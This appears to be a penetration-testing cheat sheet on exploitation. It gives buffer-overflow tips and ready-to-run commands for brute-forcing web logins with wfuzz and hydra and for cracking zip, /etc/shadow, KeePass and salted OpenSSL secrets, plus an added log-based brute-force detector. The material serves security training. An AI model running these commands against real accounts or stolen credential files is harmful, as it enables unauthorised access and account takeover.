[ Pen Testing ] :: Step by Step: Exploitation


BOF (buffer overflow) Exploits

Buffer overflows are pretty technical, but eventually you’ll find yourself using them. In most cases you’ll copy or create code and encode it into a shellcode exploit.

Review and correct the initial exploit code for configurable variables (target address, port, offsets, return address).

Pay special attention to removing all badchars. Which characters are bad depends heavily on context.

Check the code carefully after removing badchars, since removing or substituting bytes may change the way the shellcode works.

Monitor traffic with Wireshark to ensure the entire shellcode is being transmitted.

Run the exploit several times and observe obsessively.

Make sure you’re using the correct JMP ESP for the OS and language.

Weak Credentials Exploits

HTTP Brute Force Cracking

“Use colour output (-c), a wordlist as a payload (-z file,/usr/share/wfuzz/wordlist/general/common.txt), and hide 404 messages (--hc 404) to fuzz the given URL (” where FUZZ is the keyword that indicates the first insertion point for fuzzing. FUZ2Z indicates the second, etc.

wfuzz -c -z file,/usr/share/wfuzz/wordlist/general/common.txt --hc 404

See full examples at:

  • Use wfuzz against NTLM authentication.
wfuzz -c --ntlm "admin:FUZZ" -z file,/usr/share/wordlists/rockyou.txt --hc 401 https://<ip>/api
  • Use wfuzz against Basic Authentication through Proxy.
wfuzz -c --hc 404,400,401 -z file,/root/Documents/names.txt -z file,/root/Documents/names.txt --basic "FUZZ:FUZ2Z" -p https://<ip>/api/v1/
  • Use Hydra from THC (that’s why it’s often called THC Hydra) as a website password cracker.

Get it and learn it from the source:

See this good short “Summary, Tutorial and Resources”:


hydra [some command line options] [-s PORT] TARGET PROTOCOL [MODULE-OPTIONS]


hydra -s 80 http-form-post "/admin/index.php:user=^USER^&password=^PASS^:Moved Temporarily" -l admin -P /usr/share/wordlists/rockyou.txt -t 20
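A defender-side counterpart to the hydra and wfuzz commands above, as an added example that is not part of the original page: a Python detector that flags sources hammering a login form in web-server access logs. The log lines, IP addresses and threshold are constructed for illustration; the login path mirrors the hydra example, whose target signals a failed login with a redirect rather than a 401, so attempts are counted by method and path instead of status code.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Apache/nginx "combined" access-log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Constructed sample: one client posting to the login form 30 times in 30 s
# (each attempt answered with the 302 "Moved Temporarily" that the hydra
# example treats as failure), plus two requests from a legitimate user.
SAMPLE_LOG = "\n".join(
    [f'10.0.0.5 - - [01/Jan/2024:10:00:{i:02d} +0000] '
     f'"POST /admin/index.php HTTP/1.1" 302 0' for i in range(30)]
    + ['192.168.1.10 - - [01/Jan/2024:10:00:10 +0000] "GET /admin/index.php HTTP/1.1" 200 1024',
       '192.168.1.10 - - [01/Jan/2024:10:00:12 +0000] "POST /admin/index.php HTTP/1.1" 302 0']
)

def parse_line(line):
    """Return (ip, timestamp, method, path, status), or None if the line does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
    return m.group("ip"), ts, m.group("method"), m.group("path"), int(m.group("status"))

def detect_bruteforce(log_text, login_path, threshold=20, window=timedelta(seconds=60),
                      methods=("POST",), statuses=None):
    """Map source IP -> peak number of login attempts inside any sliding interval
    of length `window`, for sources that reached `threshold`. Pass statuses=(404,)
    and methods=("GET",) with a directory path to catch wfuzz-style dir fuzzing."""
    attempts = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        ip, ts, method, path, status = rec
        if path == login_path and method in methods and (statuses is None or status in statuses):
            attempts[ip].append(ts)
    flagged = {}
    for ip, times in attempts.items():
        times.sort()
        start = 0
        for end in range(len(times)):
            while times[end] - times[start] > window:   # slide the window forward
                start += 1
            count = end - start + 1
            if count >= threshold:
                flagged[ip] = max(flagged.get(ip, 0), count)
    return flagged

if __name__ == "__main__":
    print(detect_bruteforce(SAMPLE_LOG, "/admin/index.php"))  # {'10.0.0.5': 30}
```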
Password Cracking for Specific File Types/Algorithms
  • Use fcrackzip to crack password-protected zip files.
fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt file.zip
  • Use unshadow and john to crack /etc/shadow passwords.
unshadow passwd shadow > passwords
john --wordlist=/usr/share/wordlists/rockyou.txt passwords
  • Use keepass2john and john to crack keepass password databases.
keepass2john /root/Desktop/NewDatabase.kdb > file
john -incremental:alpha -format=keepass file
  • Bruteforce salted OpenSSL hashes. This example from Adon90 assumes the presence of several files: cipher and digestion hold the cipher and digest names to try (one per line), and ../miau.txt is the encrypted file; -t sets the thread count, -f the wordlist, and -1 stops at the first candidate found.
for j in $(cat cipher); do
  echo $j
  for i in $(cat digestion); do
    /root/Documents/HTB/Hawk/bruteforce-salted-openssl/bruteforce-salted-openssl -t 10 -f /usr/share/wordlists/rockyou.txt -c $j -d $i ../miau.txt -1 2>&1 | grep "candidate"
  done
done
openssl aes-256-cbc -d -in ../miau.txt -out result.txt -k friends

